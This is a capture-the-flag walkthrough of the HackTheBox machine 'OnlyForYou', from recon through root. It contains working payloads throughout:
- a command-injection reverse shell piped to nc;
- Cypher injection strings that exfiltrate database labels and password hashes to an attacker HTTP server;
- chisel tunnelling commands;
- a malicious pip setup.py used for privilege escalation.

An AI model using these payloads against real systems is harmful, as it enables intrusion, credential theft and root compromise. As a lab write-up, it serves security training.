# OnlyForYou

## 1. Initial recon

### 1.1. nikto

`nikto -host 10.10.11.210`

```
- Server: nginx/1.18.0 (Ubuntu)
- Root page / redirects to: http://only4you.htb/
- nginx/1.18.0 appears to be outdated (current is at least 1.20.1).
```

### 1.2. nmap

`nmap -sC -sV 10.10.11.210`

```
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 e883e0a9fd43df38198aaa35438411ec (RSA)
|   256 83f235229b03860c16cfb3fa9f5acd08 (ECDSA)
|_  256 445f7aa377690a77789b04e09f11db80 (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Only4you
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

### 1.3. web application recon

Under the Frequently Asked Questions section there is a "Are there some products available to check?" section which leads to `beta.only4you.htb`

From `beta.only4you.htb` we can download some source code

Looking in `app.py` we can find

* /list
* /download
* /convert (also linked on the nav bar of the web app)
* /resize (also linked on the nav bar of the web app)

after uploading an image, we are redirected to a download page where we can download a resized image of the one we just uploaded, here we find a Local File Inclusion vulnerability where we are able to download any file on the system that we want.

* capture the download in BurpSuite and change the file name in the POST request parameter `image`

by downloading `/etc/passwd` we can see some users

```
john:x:1000:1000:john:/home/john:/bin/bash
neo4j:x:997:997::/var/lib/neo4j:/bin/bash
dev:x:1001:1001::/home/dev:/bin/bash
```

we know from our nikto scan that the server is running nginx so we should also take a look at `/etc/nginx/sites-available/default`

```
server {
    listen 80;
    return 301 http://only4you.htb$request_uri;
}

server {
	listen 80;
	server_name only4you.htb;

	location / {
                include proxy_params;
                proxy_pass http://unix:/var/www/only4you.htb/only4you.sock;
	}
}

server {
	listen 80;
	server_name beta.only4you.htb;

        location / {
                include proxy_params;
                proxy_pass http://unix:/var/www/beta.only4you.htb/beta.sock;
        }
}
```

this reveals that the main `app.py` is at `/var/www/only4you.htb/app.py`

looking in `app.py` we can see an import for `forms.py`

in `forms.py` we can see that there is RCE via the lines

```py
domain = email.split("@", 1)[1]
result = run([f"dig txt {domain}"], shell=True, stdout=PIPE)
```

with the payload being delivered through the post request on the contact form found on `only4you.htb`

```
name=123&email=123%40abc.def|rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|sh+-i+2>%261|nc+10.10.x.x+4444+>/tmp/f&subject=123&message=123
```

now we have a reverse shell as the user `www-data`

## 2. user.txt

With our `www-data` reverse shell let's start by making it an interactive shell by running `python3 -c 'import pty;pty.spawn("/bin/bash");'`

### 2.1. linpeas

By navigating to `/tmp` on the victim machine, and hosting a http server using `python3 -m http.server` on our attacking machine, we can then run `curl 10.10.x.x:8000/linpeas.sh > linpeas.sh` and `chmod +x linpeas.sh` on the victim machine to download and run linpeas on the victim machine to (hopefully) find any simple privilege escalation vectors.

the most interesting output from linpeas is the active ports

```
╔══════════╣ Active Ports
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-ports                           
tcp        0      0 127.0.0.1:3000          0.0.0.0:*               LISTEN      -                       
tcp        0      0 127.0.0.1:8001          0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:33060         0.0.0.0:*               LISTEN      -                   
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      1036/nginx: worker  
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -                   
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -                   
tcp6       0      0 127.0.0.1:7687          :::*                    LISTEN      -                   
tcp6       0      0 127.0.0.1:7474          :::*                    LISTEN      -                   
tcp6       0      0 :::22                   :::*                    LISTEN      - 
```

so let's investigate these more

simply curling them with `curl 127.0.0.1:PORT` reveals:

```
curl 127.0.0.1:3000
...
<meta name="author" content="Gogs" />
<meta name="description" content="Gogs is a painless self-hosted Git service" />
<meta name="keywords" content="go, git, self-hosted, gogs">
...
```

```
curl 127.0.0.1:8001
<!doctype html>
<html lang=en>
<title>Redirecting...</title>
<h1>Redirecting...</h1>
<p>You should be redirected automatically to the target URL: <a href="/login">/login</a>. If not, click the link.
```

```
curl 127.0.0.1:7474
{
  "bolt_routing" : "neo4j://127.0.0.1:7687",
  "transaction" : "http://127.0.0.1:7474/db/{databaseName}/tx",
  "bolt_direct" : "bolt://127.0.0.1:7687",
  "neo4j_version" : "5.6.0",
  "neo4j_edition" : "community"
}
```

### 2.2. chisel (port forwarding)

so now let's try and port forward them so we can view them in the browser

let's use [Chisel](https://book.hacktricks.xyz/generic-methodologies-and-resources/tunneling-and-port-forwarding#chisel)

similar to `linpeas` we also need to curl `chisel` to the victim machine using the same method

* once `chisel` is on the victim machine run the following commands
  * `./chisel server -p 12312 --reverse` on your attacking machine
  * `./chisel client 10.10.x.x:12312 R:8001:127.0.0.1:8001` on the victim machine for the admin dashboard
  * `./chisel client 10.10.14.6:12312 R:3000:127.0.0.1:3000` on the victim machine for the local git service

then we can navigate to `127.0.0.1:8001/login` and we will be presented with a log in screen

trying some default credentials

```
admin:admin
```

leads us to a dashboard

### 2.3. neo4j injection

we can see on the dashboard that the database has been updated to Neo4j so let's see if there are any vulnerabilities

from [HackTricks](https://book.hacktricks.xyz/pentesting-web/sql-injection/cypher-injection-neo4j#server-version) there are a couple of injection payloads we can try

to catch these payloads, spin up another http server using python on your attacking machine, `python3 -m http.server`

```
' OR 1=1 WITH 1 as a  CALL dbms.components() YIELD name, versions, edition UNWIND versions as version LOAD CSV FROM 'http://10.10.x.x:8000/?version=' + version + '&name=' + name + '&edition=' + edition as l RETURN 0 as _0 // 
```

This payload we can find on hacktricks, but noticing that the above payload works, and this one doesn't we can slightly modify it

```
'}) RETURN 0 as _0 UNION CALL db.labels() yield label LOAD CSV FROM 'http://attacker_ip /?l='+label as l RETURN 0 as _0 
```

to this

```
' OR 1=1 WITH 1 as a  CALL db.labels() yield label LOAD CSV FROM 'http://attacker_ip:8000/?label='+label as l RETURN 0 as _0 //
```

from the above payload we can see that there are two labels `user` and `employee` (check the shell where you're running your python server)

```
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.11.210 - - [25/Apr/2023 04:14:10] "GET /?label=user HTTP/1.1" 200 -
10.10.11.210 - - [25/Apr/2023 04:14:10] "GET /?label=employee HTTP/1.1" 200 -
10.10.11.210 - - [25/Apr/2023 04:14:10] "GET /?label=user HTTP/1.1" 200 -
10.10.11.210 - - [25/Apr/2023 04:14:10] "GET /?label=employee HTTP/1.1" 200 -
10.10.11.210 - - [25/Apr/2023 04:14:10] "GET /?label=user HTTP/1.1" 200 -
10.10.11.210 - - [25/Apr/2023 04:14:11] "GET /?label=employee HTTP/1.1" 200 -
10.10.11.210 - - [25/Apr/2023 04:14:11] "GET /?label=user HTTP/1.1" 200 -
10.10.11.210 - - [25/Apr/2023 04:14:11] "GET /?label=employee HTTP/1.1" 200 -
10.10.11.210 - - [25/Apr/2023 04:14:11] "GET /?label=user HTTP/1.1" 200 -
10.10.11.210 - - [25/Apr/2023 04:14:11] "GET /?label=employee HTTP/1.1" 200 -
```

finally, this payload

```
' OR 1=1 WITH 1 as a MATCH (f:Flag) UNWIND keys(f) as p LOAD CSV FROM 'http://10.10.x.x:8000/?' + p +'='+toString(f[p]) as l RETURN 0 as _0 //
```

is modified to this

```
' OR 1=1 WITH 1 as a MATCH (f:user) UNWIND keys(f) as p LOAD CSV FROM 'http://10.10.x.x:8000/?' + p +'='+toString(f[p]) as l RETURN 0 as _0 //
```

and we are presented with this output

```
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.11.210 - - [25/Apr/2023 04:19:56] "GET /?password=8c6976e5b5410415bde908bd4dee15dfb167a9c873fc4bb8a81f6f2ab448a918 HTTP/1.1" 200 -
10.10.11.210 - - [25/Apr/2023 04:19:56] "GET /?username=admin HTTP/1.1" 200 -
10.10.11.210 - - [25/Apr/2023 04:19:56] "GET /?password=a85e870c05825afeac63215d5e845aa7f3088cd15359ea88fa4061c6411c55f6 HTTP/1.1" 200 -
10.10.11.210 - - [25/Apr/2023 04:19:56] "GET /?username=john HTTP/1.1" 200 -
10.10.11.210 - - [25/Apr/2023 04:19:56] "GET /?password=8c6976e5b5410415bde908bd4dee15dfb167a9c873fc4bb8a81f6f2ab448a918 HTTP/1.1" 200 -
10.10.11.210 - - [25/Apr/2023 04:19:56] "GET /?username=admin HTTP/1.1" 200 -
10.10.11.210 - - [25/Apr/2023 04:19:56] "GET /?password=a85e870c05825afeac63215d5e845aa7f3088cd15359ea88fa4061c6411c55f6 HTTP/1.1" 200 -
10.10.11.210 - - [25/Apr/2023 04:19:56] "GET /?username=john HTTP/1.1" 200 -
10.10.11.210 - - [25/Apr/2023 04:19:56] "GET /?password=8c6976e5b5410415bde908bd4dee15dfb167a9c873fc4bb8a81f6f2ab448a918 HTTP/1.1" 200 -
10.10.11.210 - - [25/Apr/2023 04:19:56] "GET /?username=admin HTTP/1.1" 200 -
10.10.11.210 - - [25/Apr/2023 04:19:56] "GET /?password=a85e870c05825afeac63215d5e845aa7f3088cd15359ea88fa4061c6411c55f6 HTTP/1.1" 200 -
10.10.11.210 - - [25/Apr/2023 04:19:56] "GET /?username=john HTTP/1.1" 200 -
10.10.11.210 - - [25/Apr/2023 04:19:56] "GET /?password=8c6976e5b5410415bde908bd4dee15dfb167a9c873fc4bb8a81f6f2ab448a918 HTTP/1.1" 200 -
10.10.11.210 - - [25/Apr/2023 04:19:56] "GET /?username=admin HTTP/1.1" 200 -
```

now let's try and crack these hashes on [CrackStation](https://crackstation.net)

```
8c6976e5b5410415bde908bd4dee15dfb167a9c873fc4bb8a81f6f2ab448a918	sha256	admin
a85e870c05825afeac63215d5e845aa7f3088cd15359ea88fa4061c6411c55f6	sha256	ThisIs4You
```

we are now able to ssh into the machine with the credentials

```
john:ThisIs4You
```

`user.txt` is located in `/home/john`

## 3. root.txt

Remembering we also port forwarded the local git service which is at port 3000. at `localhost:3000/explore/users` we can see that john is also a user, so let's see if he reuses his credentials, he does. Unfortunately there's nothing really interesting on the git repositories

`sudo -l` on our ssh terminal shows

```
User john may run the following commands on only4you:
    (root) NOPASSWD: /usr/bin/pip3 download http\://127.0.0.1\:3000/*.tar.gz
```

The first link after googling "pip install download vuln" returns us [this article](https://embracethered.com/blog/posts/2022/python-package-manager-install-and-download-vulnerability/)

clone the repo linked in the article to our attacking machine

and then we can simply change `setup.py` to

```py
...
import os

def RunCommand():
    os.system("chmod u+s /bin/bash")
    ...
```

run `python -m build` in the directory of the cloned repo to create our payload

to get the payload to work we first need to make the `Test` repo at `http://localhost:3000/john/Test` public and then we can upload our payload

our command on the victim machine will finally be:

```
sudo /usr/bin/pip3 download http\://127.0.0.1\:3000/john/Test/raw/master/this_is_fine_wuzzi-0.0.1.tar.gz
```

then run `/bin/bash -p` on the victim machine and we are root!